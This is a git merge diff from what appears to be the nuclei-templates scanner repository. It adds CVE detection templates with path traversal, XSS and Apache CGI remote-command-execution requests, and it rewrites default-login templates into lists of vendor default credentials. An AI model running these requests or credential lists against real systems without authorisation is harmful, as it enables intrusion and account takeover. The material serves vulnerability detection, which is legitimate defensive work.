Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

cves/2015/CVE-2015-2067.yaml

@@ -0,0 +1,27 @@
+id: CVE-2015-2067
+
+info:
+  name: Magento Server Magmi Plugin - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/35996
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-2067
+  tags: cve,cve2015,lfi,magento
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2015/CVE-2015-2068.yaml

@@ -0,0 +1,32 @@
+id: CVE-2015-2068
+
+info:
+  name: Magento Server Magmi Plugin - Cross Site Scripting
+  author: daffainfo
+  severity: medium
+  description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
+  reference:
+    - https://www.exploit-db.com/exploits/35996
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-2068
+  tags: cve,cve2015,magento,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

cves/2017/CVE-2017-12544.yaml

@@ -0,0 +1,37 @@
+id: CVE-2017-12544
+
+info:
+  name: HPE System Management - XSS
+  author: divya_mudgal
+  severity: medium
+  description: Reflected Cross-site scripting (XSS) on HPE System Management
+  reference:
+    - https://seclists.org/fulldisclosure/2018/Mar/5
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-12544
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2017-12544
+    cwe-id: CWE-79
+  tags: cve,cve2017,xss,hp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "var prodName = '';prompt`document.domain`;//';"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header
+
+      - type: status
+        status:
+          - 200

cves/2018/CVE-2018-9205.yaml

@@ -0,0 +1,32 @@
+id: CVE-2018-9205
+
+info:
+  name: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
+  author: daffainfo
+  severity: high
+  description: Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesnt verify users or sanitize the file path.
+  reference:
+    - https://www.exploit-db.com/exploits/44501
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-9205
+  tags: cve,cve2018,lfi,drupal
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2018-9205
+    cwe-id: CWE-22
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2020/CVE-2020-8641.yaml

@@ -0,0 +1,32 @@
+id: CVE-2020-8641
+
+info:
+  name: Lotus Core CMS 1.0.1 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  tags: cve,cve202,lfi,lotus
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8641
+    - https://cxsecurity.com/issue/WLB-2020010234
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.80
+    cve-id: CVE-2020-8641
+    cwe-id: CWE-22
+  description: "Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter."
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00'
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-41773.yaml

@@ -1,29 +1,40 @@
 id: CVE-2021-41773
 
 info:
-  name: Apache 2.4.49 - Path Traversal
+  name: Apache 2.4.49 - Path Traversal and Remote Code Execution
   author: daffainfo
-  severity: high
+  severity: critical
   description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
   reference:
     - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
     - https://twitter.com/ptswarm/status/1445376079548624899
     - https://twitter.com/h4x0r_dz/status/1445401960371429381
-  tags: cve,cve2021,lfi,apache,misconfig
+    - https://github.com/blasty/CVE-2021-41773
+  tags: cve,cve2021,lfi,rce,apache,misconfig
 
 requests:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+        GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
 
-    matchers-condition: and
+      - |
+        POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        echo Content-Type: text/plain; echo; echo 37714-1202-EVC | rev
+
+    matchers-condition: or
     matchers:
 
       - type: regex
+        name: LFI
         regex:
           - "root:.*:0:0"
 
-      - type: status
+      - type: word
-        status:
+        name: RCE
-          - 200
+        words:
+          - "CVE-2021-41773"

cves/2021/CVE-2021-42013.yaml

@@ -2,7 +2,7 @@ id: CVE-2021-42013
 
 info:
   name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
-  author: nvn1729
+  author: nvn1729,0xd0ff9
   severity: critical
   description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
   reference:
@@ -18,14 +18,24 @@ requests:
         Host: {{Hostname}}
         Origin: {{BaseURL}}
 
+      - |+
+        POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        echo Content-Type: text/plain; echo; echo 31024-1202-EVC | rev
+
     unsafe: true
-    matchers-condition: and
+    matchers-condition: or
     matchers:
 
       - type: regex
+        name: LFI
         regex:
           - "root:.*:0:0"
 
-      - type: status
+      - type: word
-        status:
+        name: RCE
-          - 200
+        words:
+          - "CVE-2021-42013"

default-logins/UCMDB/ucmdb-default-login.yaml

@@ -7,16 +7,27 @@ info:
   tags: ucmdb,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;"
+        POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1
-    body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB"
+        Host: {{Hostname}}
+
+        customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB
+
+    attack: pitchfork
+    payloads:
+      username:
+        - diagnostics
+      password:
+        - admin
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
+        part: header
         words:
           - "LWSSO_COOKIE_KEY"
-        part: header

default-logins/abb/cs141-default-login.yaml

@@ -17,23 +17,18 @@ requests:
         Accept: application/json, text/plain, */*
         Content-Type: application/json
 
-        {"userName":"admin","password":"cs141-snmp"}
+        {"userName":"{{user}}","password":"{{pass}}"}
 
-      - |
+    attack: pitchfork
-        POST /api/login HTTP/1.1
+    payloads:
-        Host: {{Hostname}}
+      user:
-        Accept: application/json, text/plain, */*
+        - admin
-        Content-Type: application/json
+        - engineer
-
+        - guest
-        {"userName":"engineer","password":"engineer"}
+      pass:
-
+        - cs141-snmp
-      - |
+        - engineer
-        POST /api/login HTTP/1.1
+        - guest
-        Host: {{Hostname}}
-        Accept: application/json, text/plain, */*
-        Content-Type: application/json
-
-        {"userName":"guest","password":"guest"}
 
     stop-at-first-match: true
     matchers-condition: and

default-logins/activemq/activemq-default-login.yaml

@@ -7,14 +7,23 @@ info:
   tags: apache,activemq,default-login
 
 requests:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - '{{BaseURL}}/admin/'
+        GET /admin/ HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Authorization: "Basic YWRtaW46YWRtaW4="
+        Authorization: Basic {{base64(username + ':' + password)}}
+
+    payloads:
+      username:
+        - user
+        - admin
+      password:
+        - user
+        - admin
+    attack: pitchfork
     matchers:
       - type: word
         words:
           - 'Welcome to the Apache ActiveMQ Console of <b>'
           - '<h2>Broker</h2>'
-        condition: and
+        condition: and

default-logins/aem/aem-default-login.yaml

@@ -4,7 +4,7 @@ info:
   name: Adobe AEM Default Login
   author: random-robbie
   severity: critical
-  tags: aem,default-login,fuzz
+  tags: aem,default-login
 
 requests:
   - raw:
@@ -15,35 +15,22 @@ requests:
         Origin: {{BaseURL}}
         Referer: {{BaseURL}}/libs/granite/core/content/login.html
 
-        _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
+        _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true
 
+    attack: pitchfork
     payloads:
-
+      aem_user:
-      rr_username:
         - admin
         - grios
         - replication-receiver
         - vgnadmin
-        - aparker@geometrixx.info
-        - jdoe@geometrixx.info
-        - james.devore@spambob.com
-        - matt.monroe@mailinator.com
-        - aaron.mcdonald@mailinator.com
-        - jason.werner@dodgit.com
 
-      rr_password:
+      aem_pass:
         - admin
         - password
         - replication-receiver
         - vgnadmin
-        - aparker
-        - jdoe
-        - password
-        - password
-        - password
-        - password
 
-    attack: pitchfork  # Available options: sniper, pitchfork and clusterbomb
     stop-at-first-match: true
     matchers-condition: and
     matchers:
@@ -53,7 +40,7 @@ requests:
 
       - type: word
         part: header
+        condition: and
         words:
           - login-token
           - crx.default
-        condition: and

default-logins/alibaba/canal-default-login.yaml

@@ -7,21 +7,29 @@ info:
   tags: alibaba,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/api/v1/user/login"
+        POST /api/v1/user/login HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Content-Type: application/json
+        Content-Type: application/json
-    body: |
+
-      {"username":"admin","password":"123456"}
+        {"username":"{{user}}","password":"{{pass}}"}
+
+    attack: pitchfork
+    payloads:
+      user:
+        - admin
+      pass:
+        - 123456
 
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
+        condition: and
         words:
           - 'data":{"token"'
           - '"code":20000'
-        condition: and

default-logins/ambari/ambari-default-login.yaml

@@ -7,11 +7,17 @@ info:
   tags: ambari,default-login
 
 requests:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name'
+        GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Authorization: "Basic YWRtaW46YWRtaW4="
+        Authorization: Basic {{base64(username + ':' + password)}}
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
     matchers:
       - type: word
         words:

default-logins/apache/airflow-default-login.yaml

@@ -21,8 +21,14 @@ requests:
         Content-Type: application/x-www-form-urlencoded
         Referer: {{BaseURL}}/admin/airflow/login
 
-        username=airflow&password=airflow&_csrf_token={{csrf_token}}
+        username={{username}}&password={{password}}&_csrf_token={{csrf_token}}
 
+    payloads:
+      username:
+        - airflow
+      password:
+        - airflow
+    attack: pitchfork
     extractors:
       - type: regex
         name: csrf_token

default-logins/apache/superset-default-login.yaml

@@ -21,11 +21,18 @@ requests:
         Content-Type: application/x-www-form-urlencoded
         Referer: {{BaseURL}}/admin/airflow/login
 
-        csrf_token={{csrff_token}}&username=admin&password=admin
+        csrf_token={{csrf_token}}&username={{username}}&password={{password}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
 
     extractors:
       - type: regex
-        name: csrff_token
+        name: csrf_token
         group: 1
         part: body
         internal: true

default-logins/arl/arl-default-login.yaml

@@ -7,23 +7,31 @@ info:
   tags: arl,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/api/user/login"
+        POST /api/user/login HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Content-Type: application/json; charset=UTF-8
+        Content-Type: application/json; charset=UTF-8
-    body: |
+
-      {"username":"admin","password":"arlpass"}
+        {"username":"{{username}}","password":"{{password}}"}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - arlpass
+    attack: pitchfork
 
     matchers-condition: and
     matchers:
 
       - type: word
+        condition: and
         words:
           - '"message": "success"'
           - '"username": "admin"'
           - '"type": "login"'
-        condition: and
+
       - type: status
         status:
           - 200

default-logins/axis2/axis2-default-login.yaml

@@ -7,13 +7,27 @@ info:
   tags: axis,apache,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/axis2-admin/login"
+        POST /axis2-admin/login HTTP/1.1
-      - "{{BaseURL}}/axis2/axis2-admin/login"
+        Host: {{Hostname}}
-    headers:
+        Content-Type: application/x-www-form-urlencoded
-      Content-Type: application/x-www-form-urlencoded
+
-    body: "userName=admin&password=axis2&submit=+Login+"
+        loginUsername={{username}}&loginPassword={{password}}
+
+      - |
+        POST /axis2/axis2-admin/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        userName={{username}}&password={{password}}&submit=+Login+
+
+    payloads:
+      username:
+        - admin
+      password:
+        - axis2
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/azkaban/azkaban-default-login.yaml

@@ -14,8 +14,14 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
-        action=login&username=admin&password=admin
+        action=login&username={{username}}&password={{password}}
 
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
     matchers-condition: and
     matchers:
       - type: word

default-logins/chinaunicom/chinaunicom-default-login.yaml

@@ -7,15 +7,26 @@ info:
   tags: chinaunicom,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/cu.html"
+        POST /cu.html HTTP/1.1
-    body: "frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password="
+        Host: {{Hostname}}
+
+        frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=
+
+    attack: pitchfork
+    payloads:
+      username:
+        - CUAdmin
+      password:
+        - CUAdmin
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 302
+
       - type: word
         words:
           - "/menu.gch"

default-logins/dell/dell-idrac-default-login.yaml

@@ -6,11 +6,19 @@ info:
   tags: dell,idrac,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/data/login"
+        POST /data/login HTTP/1.1
+        Host: {{Hostname}}
 
-    body: "user=root&password=calvin"
+        user={{username}}&password={{password}}
+
+    payloads:
+      username:
+        - root
+      password:
+        - calvin
+    attack: pitchfork
 
     headers:
       Content-Type: "application/x-www-form-urlencode"

default-logins/dell/dell-idrac9-default-login.yaml

@@ -11,8 +11,15 @@ requests:
       - |
         POST /sysmgmt/2015/bmc/session HTTP/1.1
         Host: {{Hostname}}
-        User: "root"
+        User: "{{username}}"
-        Password: "calvin"
+        Password: "{{password}}"
+
+    payloads:
+      username:
+        - root
+      password:
+        - calvin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/dell/emcecom-default-login.yaml

@@ -9,11 +9,18 @@ info:
   tags: dell,emc,ecom,default-login
 
 requests:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - '{{BaseURL}}'
+        GET / HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Authorization: Basic YWRtaW46IzFQYXNzd29yZA==
+        Authorization: Basic {{base64(username + ':' + password)}}
+
+    payloads:
+      username:
+        - root
+      password:
+        - calvin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/druid/druid-default-login.yaml

@@ -7,12 +7,25 @@ info:
   tags: druid,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/druid/submitLogin"
+        POST /druid/submitLogin HTTP/1.1
-      - "{{BaseURL}}/submitLogin"
+        Host: {{Hostname}}
 
-    body: "loginUsername=admin&loginPassword=admin"
+        loginUsername={{username}}&loginPassword={{password}}
+
+      - |
+        POST /submitLogin HTTP/1.1
+        Host: {{Hostname}}
+
+        loginUsername={{username}}&loginPassword={{password}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/dvwa/dvwa-default-login.yaml

@@ -20,7 +20,14 @@ requests:
         Cookie: PHPSESSID={{session}}; security=low
         Connection: close
 
-        username=admin&password=password&Login=Login&user_token={{token}}
+        username={{username}}&password={{password}}&Login=Login&user_token={{token}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - password
+    attack: pitchfork
 
     extractors:
       - type: regex

default-logins/exacqvision/exacqvision-default-login.yaml

@@ -15,7 +15,14 @@ requests:
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         Connection: close
 
-        action=login&u=admin&p=admin256
+        action=login&u={{username}}&p={{password}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin256
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/flir/flir-default-login.yaml

@@ -14,7 +14,14 @@ requests:
         Accept: */*
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
-        user_name=admin&user_password=admin
+        user_name={{username}}&user_password={{password}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/frps/frp-default-login.yaml

@@ -8,11 +8,18 @@ info:
   reference: https://github.com/fatedier/frp/issues/1840
 
 requests:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/api/proxy/tcp"
+        GET /api/proxy/tcp HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Authorization: "Basic YWRtaW46YWRtaW4="
+        Authorization: Basic {{base64(username + ':' + password)}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/gitlab/gitlab-weak-login.yaml

@@ -17,13 +17,13 @@ requests:
         Referer: {{BaseURL}}
         content-type: application/json
 
-        {"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"}
+        {"grant_type":"password","username":"{{username}}","password":"{{password}}"}
 
     payloads:
-      gitlab_password:
+      password:
         - 12345
         - 123456789
-      gitlab_user:
+      username:
         - 1234
         - admin
 

default-logins/glpi/glpi-default-login.yaml

@@ -1,4 +1,5 @@
 id: glpi-default-login
+
 info:
   name: GLPI Default Login
   author: andysvints
@@ -20,10 +21,14 @@ requests:
         Content-Type: application/x-www-form-urlencoded
         Referer: {{BaseURL}}
 
-        {{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}
+        {{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}}
 
-    cookie-reuse: true
+    attack: pitchfork
-    redirects: true
+    payloads:
+      user:
+        - glpi
+      pass:
+        - glpi
 
     extractors:
       - type: regex
@@ -50,11 +55,13 @@ requests:
         regex:
           - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\""
 
+    cookie-reuse: true
     matchers-condition: and
     matchers:
       - type: word
         words:
           - '<title>GLPI - Standard Interface</title>'
+
       - type: status
         status:
           - 200

default-logins/grafana/grafana-default-login.yaml

@@ -19,15 +19,17 @@ requests:
         Referer: {{BaseURL}}
         content-type: application/json
 
-        {"user":"admin","password":"§grafana_password§"}
+        {"user":"{{username}}","password":"{{password}}"}
-
 
+    attack: pitchfork
     payloads:
-      grafana_password:
+      username:
-        - prom-operator
+        - admin
         - admin
 
-    attack: sniper
+      password:
+        - prom-operator
+        - admin
 
     matchers-condition: and
     matchers:

default-logins/guacamole/guacamole-default-login.yaml

@@ -16,7 +16,14 @@ requests:
         Origin: {{Hostname}}
         Referer: {{Hostname}}
 
-        username=guacadmin&password=guacadmin
+        username={{username}}&password={{password}}
+
+    payloads:
+      username:
+        - guacadmin
+      password:
+        - guacadmin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/hongdian/hongdian-default-login.yaml

@@ -11,17 +11,26 @@ requests:
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
-        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+        Authorization: Basic {{base64(username + ':' + password)}}
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
         Accept-Encoding: gzip, deflate
 
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
-        Authorization: Basic YWRtaW46YWRtaW4=
+        Authorization: Basic {{base64(username + ':' + password)}}
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
         Accept-Encoding: gzip, deflate
 
+    payloads:
+      username:
+        - guest
+        - admin
+      password:
+        - guest
+        - admin
+    attack: pitchfork
+
     matchers-condition: and
     matchers:
       - type: word

default-logins/hortonworks/smartsense-default-login.yaml

@@ -9,11 +9,18 @@ info:
   tags: hortonworks,smartsense,default-login
 
 requests:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - '{{BaseURL}}/apt/v1/context'
+        GET /apt/v1/context HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Authorization: Basic YWRtaW46YWRtaW4=
+        Authorization: Basic {{base64(username + ':' + password)}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/hp/hp-switch-default-login.yaml

@@ -14,7 +14,13 @@ requests:
           POST /htdocs/login/login.lua HTTP/1.1
           Host: {{Hostname}}
 
-          username=admin&password=
+          username={{username}}&password=
+
+    payloads:
+      username:
+        - admin
+
+    attack: sniper
 
     matchers-condition: and
     matchers:

default-logins/ibm/ibm-storage-default-credential.yaml

@@ -14,7 +14,14 @@ requests:
         Origin: {{BaseURL}}
         Content-Type: application/x-www-form-urlencoded
 
-        j_username=admin&j_password=admin&continue=&submit=submit+form
+        j_username={{username}}&j_password={{password}}&continue=&submit=submit+form
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/idemia/idemia-biometrics-default-login.yaml

@@ -9,11 +9,17 @@ info:
   tags: idemia,biometrics,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - '{{BaseURL}}/cgi-bin/login.cgi'
+        POST /cgi-bin/login.cgi HTTP/1.1
+        Host: {{Hostname}}
 
-    body: password=12345
+        password={{password}}
+
+    payloads:
+      password:
+        - 12345
+    attack: sniper
 
     matchers-condition: and
     matchers:

default-logins/iptime/iptime-default-login.yaml

@@ -13,7 +13,14 @@ requests:
         Host: {{Hostname}}
         Referer: {{BaseURL}}/sess-bin/login_session.cgi
 
-        username=admin&passwd=admin
+        username={{username}}&passwd={{password}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/jenkins/jenkins-default.yaml

@@ -18,21 +18,22 @@ requests:
         Content-Type: application/x-www-form-urlencoded
         Cookie: {{cookie}}
 
-        j_username=admin&j_password=admin&from=%2F&Submit=Sign+in
+        j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in
-
-      - |
-        POST /j_spring_security_check HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        Cookie: {{cookie}}
-
-        j_username=jenkins&j_password=password&from=%2F&Submit=Sign+in
 
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
         Cookie: {{cookie}}
 
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+        - jenkins
+      password:
+        - admin
+        - password
+
     extractors:
       - type: regex
         name: cookie
@@ -44,7 +45,7 @@ requests:
     req-condition: true
     matchers:
       - type: dsl
+        condition: and
         dsl:
-          - 'contains(body_4, "/logout")'
+          - 'contains(body_3, "/logout")'
-          - 'contains(body_4, "Dashboard [Jenkins]")'
+          - 'contains(body_3, "Dashboard [Jenkins]")'
-        condition: and

default-logins/minio/minio-default-login.yaml

@@ -7,23 +7,20 @@ info:
   tags: default-login,minio
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/minio/webrpc"
+        POST /minio/webrpc HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
 
-    headers:
+        {"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"Web.Login"}
-      Content-Type: application/json
 
-    body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
+    payloads:
-
+      username:
-  - method: POST
+        - minioadmin
-    path:
+      password:
-      - "{{BaseURL}}/minio/webrpc"
+        - minioadmin
-
+    attack: pitchfork
-    headers:
-      Content-Type: application/json
-
-    body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
 
     matchers-condition: and
     matchers:

default-logins/nagios/nagios-default-login.yaml

@@ -6,17 +6,27 @@ info:
   tags: nagios,default-login
   reference: https://www.nagios.org
 requests:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/nagios/side.php"
+        GET /nagios/side.php HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Authorization: Basic bmFnaW9zYWRtaW46bmFnaW9zYWRtaW4=
+        Authorization: Basic {{base64(username + ':' + password)}}
+
+    payloads:
+      username:
+        - nagiosadmin
+        - root
+      password:
+        - nagiosadmin
+        - nagiosxi
+    attack: pitchfork
 
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         words:
           - 'Current Status'

default-logins/nexus/nexus-default-login.yaml

@@ -14,7 +14,14 @@ requests:
         X-Nexus-UI: true
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
-        username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
+        username={{base64(username)}}&password={{base64(password)}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin123
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/nps/nps-default-login.yaml

@@ -7,13 +7,21 @@ info:
   tags: nps,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/login/verify"
+        POST /login/verify HTTP/1.1
-    body: "username=admin&password=123"
+        Host: {{Hostname}}
-    headers:
+        Content-Type: application/x-www-form-urlencoded
-      Content-Type: application/x-www-form-urlencoded
+        Referer: {{Hostname}}/login/index
-      Referer: "{{Hostname}}/login/index"
+
+        username={{username}}&password={{password}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - 123
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/ofbiz/ofbiz-default-login.yaml

@@ -7,12 +7,21 @@ info:
   tags: ofbiz,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - '{{BaseURL}}/control/login'
+        POST /control/login HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Content-Type: application/x-www-form-urlencoded
+        Content-Type: application/x-www-form-urlencoded
-    body: USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
+
+        USERNAME={{username}}&PASSWORD={{password}}&FTOKEN=&JavaScriptEnabled=Y
+
+    payloads:
+      username:
+        - admin
+      password:
+        - ofbiz
+    attack: pitchfork
+
     matchers:
       - type: word
         words:

